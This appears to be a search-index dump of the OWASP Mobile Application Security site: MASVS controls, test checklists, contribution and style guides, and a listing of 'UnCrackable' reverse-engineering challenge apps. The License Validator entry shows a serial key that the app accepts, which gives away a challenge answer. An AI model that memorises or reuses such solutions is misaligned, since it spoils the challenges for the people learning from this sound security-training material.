Apps handle sensitive data coming from many sources such as the user, the backend, system services or other apps on the device and usually need to store it locally. The storage locations may be private to the app (e.g. its internal storage) or be public and therefore accessible by the user or other installed apps (e.g. public folders such as Downloads). This control ensures that any sensitive data that is intentionally stored by the app is properly protected independently of the target location.
"},{"location":"MASVS/controls/MASVS-STORAGE-2/","title":"MASVS-STORAGE-2","text":"The app prevents leakage of sensitive data.
There are cases when sensitive data is unintentionally stored or exposed to publicly accessible locations; typically as a side-effect of using certain APIs, system capabilities such as backups or logs. This control covers this kind of unintentional leaks where the developer actually has a way to prevent it.
"},{"location":"checklists/MASVS-AUTH/","title":"MASVS AUTH","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-AUTH-1 The app uses secure authentication and authorization protocols and follows the relevant best practices. MASVS-AUTH-2 The app performs local authentication securely according to the platform best practices. Testing Confirm Credentials Testing Biometric Authentication Testing Local Authentication MASVS-AUTH-3 The app secures sensitive operations with additional authentication. "},{"location":"checklists/MASVS-CODE/","title":"MASVS CODE","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-CODE-1 The app requires an up-to-date platform version. MASVS-CODE-2 The app has a mechanism for enforcing app updates. Testing Enforced Updating Testing Enforced Updating MASVS-CODE-3 The app only uses software components without known vulnerabilities. Checking for Weaknesses in Third Party Libraries Checking for Weaknesses in Third Party Libraries MASVS-CODE-4 The app validates and sanitizes all untrusted inputs. Make Sure That Free Security Features Are Activated Testing for Injection Flaws Testing Local Storage for Input Validation Memory Corruption Bugs Testing Object Persistence Testing Implicit Intents Testing for URL Loading in WebViews Testing Object Persistence Memory Corruption Bugs Make Sure That Free Security Features Are Activated "},{"location":"checklists/MASVS-CRYPTO/","title":"MASVS CRYPTO","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-CRYPTO-1 The app employs current strong cryptography and uses it according to industry best practices. Testing Random Number Generation Testing Symmetric Cryptography Testing the Configuration of Cryptographic Standard Algorithms Verifying the Configuration of Cryptographic Standard Algorithms Testing Random Number Generation MASVS-CRYPTO-2 The app performs key management according to industry best practices. Testing the Purposes of Keys Testing Key Management "},{"location":"checklists/MASVS-NETWORK/","title":"MASVS NETWORK","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-NETWORK-1 The app secures all network traffic according to the current best practices. Testing the TLS Settings Testing Data Encryption on the Network Testing Endpoint Identify Verification Testing the Security Provider Testing Data Encryption on the Network Testing Endpoint Identity Verification Testing the TLS Settings MASVS-NETWORK-2 The app performs identity pinning for all remote endpoints under the developer's control. Testing Custom Certificate Stores and Certificate Pinning Testing Custom Certificate Stores and Certificate Pinning "},{"location":"checklists/MASVS-PLATFORM/","title":"MASVS PLATFORM","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-PLATFORM-1 The app uses IPC mechanisms securely. Testing for Vulnerable Implementation of PendingIntent Determining Whether Sensitive Stored Data Has Been Exposed via IPC Mechanisms Testing for App Permissions Testing for Sensitive Functionality Exposure Through IPC Testing Deep Links Testing Universal Links Testing UIActivity Sharing Testing UIPasteboard Testing Custom URL Schemes Testing App Permissions Testing App Extensions Determining Whether Sensitive Data Is Exposed via IPC Mechanisms MASVS-PLATFORM-2 The app uses WebViews securely. Testing WebViews Cleanup Testing for Java Objects Exposed Through WebViews Testing WebView Protocol Handlers Testing JavaScript Execution in WebViews Testing iOS WebViews Determining Whether Native Methods Are Exposed Through WebViews Testing WebView Protocol Handlers MASVS-PLATFORM-3 The app uses the user interface securely. Checking for Sensitive Data Disclosure Through the User Interface Testing for Overlay Attacks Finding Sensitive Information in Auto-Generated Screenshots Testing Auto-Generated Screenshots for Sensitive Information Checking for Sensitive Data Disclosed Through the User Interface "},{"location":"checklists/MASVS-PRIVACY/","title":"MASVS PRIVACY","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-PRIVACY-1 The app minimizes access to sensitive data and resources. MASVS-PRIVACY-2 The app prevents identification of the user. MASVS-PRIVACY-3 The app is transparent about data collection and usage. MASVS-PRIVACY-4 The app offers user control over their data. "},{"location":"checklists/MASVS-RESILIENCE/","title":"MASVS RESILIENCE","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-RESILIENCE-1 The app validates the integrity of the platform. Testing Root Detection Testing Emulator Detection Testing Jailbreak Detection Testing Emulator Detection MASVS-RESILIENCE-2 The app implements anti-tampering mechanisms. Testing File Integrity Checks Making Sure that the App is Properly Signed Testing Runtime Integrity Checks Testing File Integrity Checks Making Sure that the App Is Properly Signed MASVS-RESILIENCE-3 The app implements anti-static analysis mechanisms. Testing for Debugging Code and Verbose Error Logging Testing for Debugging Symbols Testing Obfuscation Testing for Debugging Code and Verbose Error Logging Testing Obfuscation Testing for Debugging Symbols MASVS-RESILIENCE-4 The app implements anti-dynamic analysis techniques. Testing Anti-Debugging Detection Testing whether the App is Debuggable Testing Reverse Engineering Tools Detection Testing Anti-Debugging Detection Testing Reverse Engineering Tools Detection Testing whether the App is Debuggable "},{"location":"checklists/MASVS-STORAGE/","title":"MASVS STORAGE","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-STORAGE-1 The app securely stores sensitive data. Testing the Device-Access-Security Policy Testing Local Storage for Sensitive Data Testing Local Data Storage MASVS-STORAGE-2 The app prevents leakage of sensitive data. Determining Whether Sensitive Data Is Shared with Third Parties via Embedded Services Testing Backups for Sensitive Data Testing Logs for Sensitive Data Determining Whether Sensitive Data Is Shared with Third Parties via Notifications Testing Memory for Sensitive Data Determining Whether the Keyboard Cache Is Disabled for Text Input Fields Testing Memory for Sensitive Data Determining Whether Sensitive Data Is Shared with Third Parties Testing Backups for Sensitive Data Checking Logs for Sensitive Data Finding Sensitive Data in the Keyboard Cache "},{"location":"contributing/1_How_Can_You_Contribute/","title":"How Can You Contribute?","text":"You can directly contribute to the MASVS or MASTG in many different ways! First, go ahead and create a GitHub account for free on the GitHub homepage.
"},{"location":"contributing/1_How_Can_You_Contribute/#contribution-flow","title":"Contribution Flow","text":"flowchart LR\n A(Open Discussion) -->|discuss| C{qualifies?}\n C -->|Yes| D(Issue)\n C -->|No| E[Close]\n D -->|open PR| F(Pull Request)\n F -->|review| G{approved?}\n F -->|make changes| F\n G -->|Yes| H[Merge]\n G -->|No| I[Close]
"},{"location":"contributing/1_How_Can_You_Contribute/#participate-in-discussions","title":"\ud83d\udcac Participate in Discussions","text":"Our GitHub Discussions are the first place to go to ask questions, give feedback, and propose new ideas. If your proposal qualifies for the MASTG/MASVS, we'll convert it into an \"Issue\" (the discussion might take a while).
"},{"location":"contributing/1_How_Can_You_Contribute/#create-issues","title":"\ud83c\udfaf Create Issues","text":"Before creating a PR, first create an Issue to be discussed for missing requirements, content or errors.
You can contribute with content or corrections by opening a Pull Request (PR).
Learn how to open a PR here.
"},{"location":"contributing/1_How_Can_You_Contribute/#become-a-reviewer","title":"\u2705 Become a Reviewer","text":"You can Review Pull Requests (PRs) and also gain contributions. If you are a fluent speaker in any of the different languages that the MASVS is available in, feel free to give feedback on any of the submitted PRs.
After your PR or issue has been submitted, we will review it as quickly as possible which typically only takes a few days. If you think we have forgotten about it, feel free to give us a nudge after 7 days have passed.
Learn how to review a PR here.
"},{"location":"contributing/1_How_Can_You_Contribute/#proof-reading","title":"\ud83d\udd0e Proof-reading","text":"If you do proof-reading, these are the things we\u2019re looking for:
Refer to Google Technical Writing trainings for more info:
First of all Create a GitHub account (a free one is enough) by following these steps.
Our workflow is like this:
Open a Discussion (for ideas and proposals) If your proposal qualifies for the MASTG/MASVS we'll convert it into an \"Issue\" (the discussion might take a while).
MASVS Example: \"Add a MASVS-CRYPTO requirement on Key rotation\"
MASTG Example: \"Add a Test case for key rotation\"
Open an Issue (for concrete actionable things that have to / could be done) For instance, there's a typo, or it's clear that a certain Test case doesn't have e.g. \"Dynamic Analysis\" and it should be added.
Normally, contributors should follow the whole flow. But sometimes it's clear what's needed so we directly go to 2 (open an issue) or even to 3 (open a PR). We recommend starting with a discussion or directly contacting us to save you the hurdle of writing and submitting new content that does not qualify so we have to reject it after the work is done.
If you just have an specific question you can post it to (you need a GitHub Account):
\"GitHub Discussions\" are re-posted to our Slack channel.
Once you get your answer please mark it as answered. When you mark a question as an answer, GitHub will highlight the comment and replies to the comment to help visitors quickly find the answer.
"},{"location":"contributing/2_Getting_Started/#contribute-online","title":"Contribute Online","text":"GitHub makes this extremely easy.
For small changes in one file:
For more complex changes or across files:
.
while browsing the repo or pull request.Learn more about the github.dev Web-based Editor in \"GitHub Docs\".
"},{"location":"contributing/2_Getting_Started/#contribute-offline","title":"Contribute Offline","text":"For this you need an IDE or text editor and git on your machine. We recommend using the free Visual Studio Code editor with the markdownlint extension.
$ git clone https://github.com/<your_github_user>/owasp-masvs.git\n$ cd owasp-masvs/\n$ git remote add upstream git@github.com:OWASP/owasp-masvs.git\n
$ git checkout -b fix-issue-1456\n
git add MYFILE
for every file you have modified, followed by git commit -m 'Your Commit Message'
to commit the modifications and git push
to push your modifications to GitHub.You can create a Pull Request (PR) by following these steps. Remember that:
master
.#<issue-id>
\".Your PR will be reviewed soon (refer to this page to learn more about reviews).
Before opening a PR please self-review your changes in GitHub and ensure that you follow our style guide to speed up the review process\u26a1
"},{"location":"contributing/3_PRs_and_Reviews/#how-to-incorporate-the-reviewers-feedback-to-your-pr","title":"How to Incorporate the Reviewer's Feedback to your PR","text":"It might be directly approved and merged or one of our reviewers will send you some comments and suggested changes.
When reviewers suggest changes in a pull request, you can automatically incorporate the changes into your PR.
NOTE: Remember to regularly sync your fork with the upstream repo. This gets you the latest changes and makes easier to merge your PR.
git pull upstream/master\n
"},{"location":"contributing/3_PRs_and_Reviews/#how-to-review-a-pr","title":"How to Review a PR","text":"If you'd like to review an open PR please follow these steps:
"},{"location":"contributing/3_PRs_and_Reviews/#step-1-comment-and-suggest-changes","title":"Step 1: Comment and Suggest Changes","text":"You can enter single or multi-line comments (click and drag to select the range of lines):
Always prefer making \"Suggested Changes\" using the \u00b1
button:
If the suggestion you'd like to make cannot be expressed using \"suggested changes\" please enter a clear comment explaining what should be fixed (e.g. some paragraphs don't link properly or some essential information cannot be found and should be added).
Using \"Suggested Changes\" saves you as a reviewer and the PR author a lot of time. And you get points (attributions) for the changes that you suggested (if the author commits them you become a co-author of those commits). If you're constant with your reviewer work you can apply to be recognize as an official reviewer in our Acknowledgements page.
"},{"location":"contributing/3_PRs_and_Reviews/#step-2-submit-your-review","title":"Step 2: Submit your Review","text":"Once you went through the whole PR you can submit your review
Learn more: \"(GitHub Docs) Reviewing proposed changes in a pull request\".
"},{"location":"contributing/4_Add_new_Language/","title":"Add a New Language","text":""},{"location":"contributing/4_Add_new_Language/#mastg-translations","title":"MASTG Translations","text":"The MASTG is a living document that changes and adapts to the most recent security recommendations every day. While we do want to reach the maximum audience possible, our past experience shows that maintaining translations has proven to be an extremely challenging task. Therefore, please understand that any PRs containing MASTG translations will be declined, but you're free to do them on your own forks.
\ud83c\uddef\ud83c\uddf5 A translation of the MASTG into Japanese is available on Github: https://github.com/coky-t/owasp-mstg-ja. Thanks to @coky-t for pushing this forward!
That said, we **strongly encourage further translations of the MASVS as it is much easier to maintain and you'll get a translated Mobile App Security Checklists mapping to the MASTG for free.
"},{"location":"contributing/4_Add_new_Language/#masvs-translations","title":"MASVS Translations","text":"To add a new language you have to follow the steps from both sections below.
Document-ja
.metadata.md
from another language and modify it for the new language.export.py
.github/workflows/docgenerator.yml
and add the action steps for the new language.../LANGS.md
to include the new language.../README.md
with the newly available language.IMPORTANT: only after releasing the MASVS!
src/scripts/gen_all_excel.sh
.The following rules are meant to ensure consistency of the MASTG:
We recommend you to take these free Google courses when writing or reviewing content for the MAS project:
The primary measure for amount of content on a page should be based on the purpose it serves.
Those containing one or two screens of text at most. Users are scanning for link choices. Use longer pages (those that require more scrolling or reading) deeper within the chapter where content can be printed and read later.
Consider creating a supporting document and linking to it from the page rather than displaying all the information directly on the page.
"},{"location":"contributing/5_Style_Guide/#gender-neutrality","title":"Gender Neutrality","text":"The MASTG reaches all kind of people all over the world. To ensure inclusiveness and diversity, please refrain from using the following throughout the book:
Or any other constructions like \"he/she\", \"s/he\", \"his or her\". Instead, use the following gender-neutral alternatives:
There is one exception: We are still using \"man in the middle\", as it is simply a common term in the industry and there is no common replacement for it.
"},{"location":"contributing/5_Style_Guide/#timeliness-of-content","title":"Timeliness of Content","text":"Keeping accurate and timely content establishes the OWASP MAS deliverables as a credible and trustworthy source of information.
When using statistical data on your page, ensure that the information is current and up-to-date and is accompanied by the source from which it was derived, along with the date the data was compiled.
"},{"location":"contributing/5_Style_Guide/#content-for-the-digital-platform-versus-for-print","title":"Content for the Digital Platform Versus for Print","text":"Write concise content that the user can read quickly and efficiently. For digital content - create shorter pages that are cross-linked. If your content is likely to be printed, create one long page.
"},{"location":"contributing/5_Style_Guide/#audience","title":"Audience","text":"Write for an international audience with a basic level of technical understanding i.e. they have a mobile phone and know how to install an app. Avoid hard-to-translate slang words/phrases to ensure content is accessible to readers who aren't native English speakers.
"},{"location":"contributing/5_Style_Guide/#context-and-orientation","title":"Context and Orientation","text":"Let the users know where they are on every page. Establish the topic by using a unique page heading.
Include a clear and concise introduction where possible.
Link to background information where necessary.
"},{"location":"contributing/5_Style_Guide/#write-so-people-will-read-with-joy","title":"Write so People Will Read with Joy","text":"Use the following methods to increase scannability:
-
rather than asterisks *
for listsFor longer pages, use the following tools to make the page easily scannable:
When presenting your content in a list format:
When using a number between zero and ten, spell out the number (e.g., \"three\" or \"ten\").
When using any number higher than ten, use the numeric version (e.g., \"12\" or \"300\").
"},{"location":"contributing/5_Style_Guide/#2-language","title":"2. Language","text":""},{"location":"contributing/5_Style_Guide/#american-spelling-and-terminology","title":"American Spelling and Terminology","text":"Use American spelling and terminology.
Change all British spelling and terminology to the American equivalents where applicable. This includes \"toward\" (US) vs. \"towards\" (UK), \"among\" (US) vs. \"amongst\" (UK), \"analyze\" (US) vs. \"analyse\" (UK), \"behavior\" (US) vs \"behaviour\" (UK), etc.
"},{"location":"contributing/5_Style_Guide/#plurals","title":"Plurals","text":"Adhere to standard grammar and punctuation rules when it comes to pluralization of typical words.
The plural of calendar years does not take the apostrophe before the \"s\". For example, the plural form of 1990 is 1990s.
"},{"location":"contributing/5_Style_Guide/#title-capitalization","title":"Title Capitalization","text":"We follow the title case rules from the \"Chicago Manual of Style\":
When in doubt, you can verify proper capitalization on https://titlecaseconverter.com/.
"},{"location":"contributing/5_Style_Guide/#standardization","title":"Standardization","text":"This is a list of words/abbreviations that are used inconsistently at the moment in the MASTG and need standardization:
Use the following common contractions:
Abbreviations include acronyms, initialisms, shortened words, and contractions.
The following snippet demonstrates most of these points:
## JAR Files\n\nJAR (Java ARchive) files are [...]\n\nAPKs are packed using the ZIP format. An APK is a variation of a JAR file [...]\n
For commonly used file formats such as APK, IPA or ZIP, please do not refer to them as \".apk\", \".ipa\" or \".zip\" unless you're explicitly referring to the file extension.
"},{"location":"contributing/5_Style_Guide/#referencing-android-versions","title":"Referencing Android versions","text":"Use the following format when referring to an Android version: Android X (API level YY). Usage of the descriptive name (Ex: Oreo) is discouraged.
Ex: Android 9 (API level 28)
"},{"location":"contributing/5_Style_Guide/#addressing-the-reader-in-test-cases","title":"Addressing the Reader in Test Cases","text":"Throughout the guide, you may want to address the readers in order to tell them what to do, or what they should notice. For any such case, use an active approach and simply address the reader using \"you\".
Correct: If you open the AndroidManifest.xml file, you will see a main Application tag, with the following attributes: atr1, atr2 and atr3. If you run the following command, you will see that atr1 is actually dangerous: [...].
Wrong: The AndroidManifest.xml file contains an Application tag, with the following attributes: atr1, atr2 and atr3. The command below shows that atr1 is dangerous: [...].
Wrong: If we open the AndroidManifest.xml file, we will see a main Application tag, with the following attributes: atr1, atr2 and atr3. If we run the following command, we will see that atr1 is actually dangerous: [...].
"},{"location":"contributing/5_Style_Guide/#3-external-references","title":"3. External References","text":""},{"location":"contributing/5_Style_Guide/#web-links","title":"Web Links","text":"Use markdown's in-line link format (A) [TEXT](URL \"TITLE\")
or (B) [TEXT](URL)
.
For example:
The [threat modeling guidelines defined by OWASP](https://owasp.org/www-community/Threat_Modeling \"OWASP Threat Modeling\") are generally applicable to mobile apps.\n
When using (A), be sure to escape special characters such as apostrophe (\\') or single quote (`), as otherwise the link will be broken in Gitbook.
Wrong usage, see \"iPhone's\":
[UDID of your iOS device via iTunes](https://medium.com/@igor_marques/how-to-find-an-iphones-udid-2d157f1cf2b9 \"How to Find Your iPhone's UDID\")\n
Right usage, see \"iPhone\\'s\":
[UDID of your iOS device via iTunes](https://medium.com/@igor_marques/how-to-find-an-iphones-udid-2d157f1cf2b9 \"How to Find Your iPhone\\'s UDID\")\n
When adding links to the \"References\" section at the end of the chapters use - Title - <url>
. This is needed to force latex to print URLs properly for the PDF.
For example:
- adb - <https://developer.android.com/studio/command-line/adb>\n
"},{"location":"contributing/5_Style_Guide/#books-and-papers","title":"Books and Papers","text":"For books and papers, use the following format: [#NAME]
.
And include the full reference in the \"References\" section at the end of the markdown file manually. Example:
An obfuscated encryption algorithm can generate its key (or part of the key)\nusing data collected from the environment [#riordan].\n
And under the \"References\" section at the end of the chapters:
- [#riordan] - James Riordan, Bruce Schneier. Environmental Key Generation towards Clueless Agents. Mobile Agents and Security, Springer Verlag, 1998\n
Papers:
The general form for citing technical reports is to place the name and location of the company or institution after the author and title and to give the report number and date at the end of the reference.
Basic Format:
- [shortname] J. K. Author, \"Title of report,\" Abbrev. Name of Co., City of Co., Abbrev. State, Rep. xxx, year\n\n- [shortname] \\[Author(s)\\], \\[Title\\] - Link\n
Books:
- [shortname] \\[Author(s)\\], \\[Title\\], \\[Published\\], \\[Year\\]\n\n- [examplebook] J. K. Author, \"Title of chapter in the book,\" in Title of His Published Book, xth ed. City of Publisher, Country if not USA: Abbrev. of Publisher, year, ch. x, sec. x, pp. xxx-xxx.\n
NOTE: Use et al. when three or more names are given
e.g.
- [klaus] B. Klaus and P. Horn, Robot Vision. Cambridge, MA: MIT Press, 1986.\n- [stein] L. Stein, \"Random patterns,\" in Computers and You, J. S. Brake, Ed. New York: Wiley, 1994, pp. 55-70.\n- [myer] R. L. Myer, \"Parametric oscillators and nonlinear materials,\" in Nonlinear Optics, vol. 4, P. G. Harper and B. S. Wherret, Eds. San Francisco, CA: Academic, 1977, pp. 47-160.\n- [abramowitz] M. Abramowitz and I. A. Stegun, Eds., Handbook of Mathematical Functions (Applied Mathematics Series 55). Washington, DC: NBS, 1964, pp. 32-33.\n
"},{"location":"contributing/5_Style_Guide/#4-references-within-the-guide","title":"4. References Within The Guide","text":"For references to other chapters in the MASTG, simply name the chapter, e.g.: See also the chapter \"Basic Security Testing\"
, See the section \"Apktool\" in the chapter \"Basic Security Testing\"
etc. The MASTG should be convenient to read as a printed book, so use internal references sparingly. Alternatively you can create a link for the specific section:
See the section \"[App Bundles](0x05a-Platform-Overview.md#app-bundles)\" in the chapter ...\n
Note that in such a case the anchor (everything after the #
) should be lowercase, and spaces should be replaced with hyphens.
Pictures should be uploaded to the Images/Chapters directory. Afterwards they should be embedded by using the image tag, a width of 500px should be specified. For example:
<img src=\"Images/Chapters/0x06d/key_hierarchy_apple.jpg\" width=\"500px\"/>\n- *iOS Data Protection Key Hierarchy*\n
"},{"location":"contributing/5_Style_Guide/#6-punctuation-conventions","title":"6. Punctuation Conventions","text":""},{"location":"contributing/5_Style_Guide/#lowercase-or-capital-letter-after-a-colon","title":"Lowercase or Capital Letter after a Colon","text":"Chicago Manual of Style (6.61: Lowercase or capital letter after a colon) says: lowercase the first word unless it is a proper noun or the start of at least two complete sentences or a direct question.
"},{"location":"contributing/5_Style_Guide/#serial-comma-use","title":"Serial Comma Use","text":"Use a serial comma before \"and\" for the last item in a run-in list of three or more items. For example:
We bought apples, oranges, and tomatoes from the store.
"},{"location":"contributing/5_Style_Guide/#quote-marks-and-apostrophes","title":"Quote Marks and Apostrophes","text":"Use straight double quotes, straight single quotes, and straight apostrophes (not curly quotes/apostrophes).
"},{"location":"contributing/5_Style_Guide/#technical-terms","title":"Technical Terms","text":"Spell/punctuate specific technical terms as they are used by the company (e.g., use the company website).
In order of preference, spell/punctuate generic technical terms according to
Markdown blockquotes can be used for comments in the documents by using >
> This is a blockquote\n
"},{"location":"contributing/5_Style_Guide/#8-code-and-shell-commands","title":"8. Code and Shell Commands","text":"Use code blocks when including sample code, shell commands, and paths. In Markdown, code blocks are denoted by triple backticks (```
). GitHub also supports syntax highlighting for a variety of languages. For example, a Java code block should be annotated as follows:
```java\n public static void main(String[] args) { System.out.println(\" Hello World!\"); } } ;\n ```\n
This produces the following result:
public static void main(String[] args) { System.out.println(\" Hello World!\"); } }\n
When including shell commands, make sure to the language for correct syntax highlighting (e.g. shell
or bash
) and remove any host names and usernames from the command prompt, e.g.:
```shell\n $ echo 'Hello World'\n Hello World\n ```\n
When a command requires parameters that need to be modified by the reader, surround them with angle brackets:
$ adb pull <remote_file> <target_destination>\n
"},{"location":"contributing/5_Style_Guide/#in-text-keywords","title":"In-text Keywords","text":"When they do not occur in a code block, place the following code-related keywords in backticks (``
), double straight quote marks (\"\"
), or leave unpunctuated according to the table:
true
, 0
, YES
) XML attributes (e.g., get-task-allow
on iOS Plists, \"@string/app_name\"
on Android Manifests) XML attribute values (e.g., android:label
on Android Manifests) property names object names API calls interface names If nouns in backticks are plural, place the \"s\" after the second backtick (e.g. RuntimeException
s). Do not add parentheses, brackets, or other punctuation to any keywords that are in backticks (e.g., main
not main()
).
When referring to any UI element by name, put its name in boldface, using **<name>**
(e.g., Home -> Menu).
The MAS project is a powerful learning resource and the MAS Crackmes are no exception. They allow the MAS community not only to practice the MAS skills they've learned from the MASTG but also let them confirm their approaches to the used techniques, especially when performing reverse engineering.
"},{"location":"contributing/6_Add_a_Crackme/#who-can-contribute-with-a-crackme","title":"Who Can Contribute with a Crackme?","text":"Anyone from individuals to companies. You only have to read and accepts the Terms and Conditions listed below.
Before submitting a crackme, first of all contact the MAS team here: https://mas.owasp.org/contact/
"},{"location":"contributing/6_Add_a_Crackme/#terms-and-conditions","title":"Terms and Conditions","text":"If you want to contribute to the MAS crackmes please consider that:
\u2611\ufe0f The source code of the crackme apps must be made publicly available at https://github.com/OWASP/mas-crackmes.
\u2611\ufe0f The crackme apps must be reviewed and approved by the MAS project leaders. Some form of documentation and solution writeup/video must be provided for the review process. That must include a list of \"features\" including techniques used (e.g. obfuscation, whitebox crypto, inline assembly, etc.)
\u2611\ufe0f The crackme apps must not contain any company branding or advertising material (ads, company URL, etc.).
\u2611\ufe0f The crackme apps must align with the MASVS and MASTG in some way.
\u2611\ufe0f The crackme authors are fully responsible for the maintenance of the crackme in the case bugfixes or updates are needed and the MAS team is not able to perform those actions.
"},{"location":"contributing/6_Add_a_Crackme/#publishing-and-acknowledgements","title":"Publishing and Acknowledgements","text":"When successfully adding a crackme, its authors will be credited in the corresponding crackme page in the project website at https://mas.owasp.org/crackmes and an announcement will be made via the official MAS social media channels.
"},{"location":"contributing/6_Add_a_Crackme/#owasp-openness-and-licencing-guidelines","title":"OWASP Openness and Licencing Guidelines","text":"The OWASP projects have a strong foundation in openness and this includes all material related to the projects.
OWASP Projects must be open in all facets, including source material, contributors, organizational structure, and finances (if any). Project source code (if applicable) must be made openly available, project communication channels (e.g. mailing lists, forums) should be open and free from censorship, and all project materials must be licensed under a community friendly license as approved by the Free Software Foundation (Appendix 8.2).
Please refer to the OWASP Project Leader Handbook that we as project leaders need to comply with: https://owasp.org/www-pdf-archive/PROJECT_LEADER-HANDBOOK_2014.pdf
"},{"location":"crackmes/","title":"MAS Crackmes","text":"Welcome to the MAS Crackmes aka. UnCrackable Apps, a collection of mobile reverse engineering challenges. These challenges are used as examples throughout the OWASP MASTG. Of course, you can also solve them for fun.
Android UnCrackable L1 UnCrackable-Level1.apk Download Android UnCrackable L2 UnCrackable-Level2.apk Download Android UnCrackable L3 UnCrackable-Level3.apk Download Android UnCrackable L4 r2pay-v0.9.apk Download Android UnCrackable DRM validate (ELF 32-bit) Download iOS UnCrackable L1 UnCrackable-Level1.ipa Download iOS UnCrackable L2 UnCrackable-Level2.ipa Download "},{"location":"crackmes/Android/","title":"Android Crackmes","text":""},{"location":"crackmes/Android/#android-uncrackable-l1","title":"Android UnCrackable L1","text":"A secret string is hidden somewhere in this app. Find a way to extract it.
Download
InstallationThis app is compatible with Android 4.4 and up.
$ adb install UnCrackable-Level1.apk\n
SPOILER (Solutions) By Bernhard Mueller
"},{"location":"crackmes/Android/#android-uncrackable-l2","title":"Android UnCrackable L2","text":"This app holds a secret inside. May include traces of native code.
Download
InstallationThis app is compatible with Android 4.4 and up.
$ adb install UnCrackable-Level2.apk\n
SPOILER (Solutions) By Bernhard Mueller. Special thanks to Michael Helwig for finding and fixing an oversight in the anti-tampering mechanism.
"},{"location":"crackmes/Android/#android-uncrackable-l3","title":"Android UnCrackable L3","text":"The crackme from hell! A secret string is hidden somewhere in this app. Find a way to extract it.
Download
InstallationThis app is compatible with Android 4.4 and up.
$ adb install UnCrackable-Level3.apk\n
SPOILER (Solutions) By Bernhard Mueller. Special thanks to Eduardo Novella for testing, feedback and pointing out flaws in the initial build(s).
"},{"location":"crackmes/Android/#android-uncrackable-l4","title":"Android UnCrackable L4","text":"The Radare2 community always dreamed with its decentralized and free currency to allow r2 fans to make payments in places and transfer money between r2 users. A debug version of the r2Pay app has been developed and it will be supported very soon in many stores and websites. Can you verify that this is cryptographically unbreakable?
Hint: Run the APK in a non-tampered device to play a bit with the app.
r2con{PIN_NUMERIC:SALT_LOWERCASE}
r2con{ascii(key)}
Versions:
Download v0.9
Download v1.0
v0.9
- Release for OWASP MAS: Source code is available and the compilation has been softened in many ways to make the challenge easier and more enjoyable for newcomers.v1.0
- Release for R2con CTF 2020: No source code is available and many extra protections are in place.This app is compatible with Android 4.4 and up.
$ adb install r2pay-v0.9.apk\n
SPOILER (Solutions) Created and maintained by Eduardo Novella & Gautam Arvind. Special thanks to NowSecure for supporting this crackme.
"},{"location":"crackmes/Android/#android-license-validator","title":"Android License Validator","text":"A brand new Android app sparks your interest. Of course, you are planning to purchase a license for the app eventually, but you'd still appreciate a test run before shelling out $1. Unfortunately no keygen is available! Generate a valid serial key that is accepted by this app.
Download
InstallationCopy the binary to your Android device and run using the shell.
$ adb push validate /data/local/tmp\n[100%] /data/local/tmp/validate\n$ adb shell chmod 755 /data/local/tmp/validate\n$ adb shell /data/local/tmp/validate\nUsage: ./validate <serial>\n$ adb shell /data/local/tmp/validate 1234\nIncorrect serial (wrong format).\n$ adb shell /data/local/tmp/validate JACE6ACIARNAAIIA\nEntering base32_decode\nOutlen = 10\nEntering check_license\nProduct activation passed. Congratulations!\n
SPOILER (Solutions) By Bernhard Mueller
"},{"location":"crackmes/Android/#mastg-hacking-playground","title":"MASTG Hacking Playground","text":"Did you enjoy working with the Crackmes? There is more! Go to the MASTG Hacking Playground and find out!
